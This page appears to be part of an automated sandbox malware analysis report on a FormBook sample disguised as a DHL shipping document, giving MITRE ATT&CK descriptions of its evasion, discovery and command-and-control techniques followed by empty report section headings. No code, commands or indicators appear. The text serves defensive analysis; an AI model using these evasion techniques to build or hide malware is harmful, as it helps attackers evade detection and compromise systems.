Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report DHL AWB# 4AB19037XXX.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries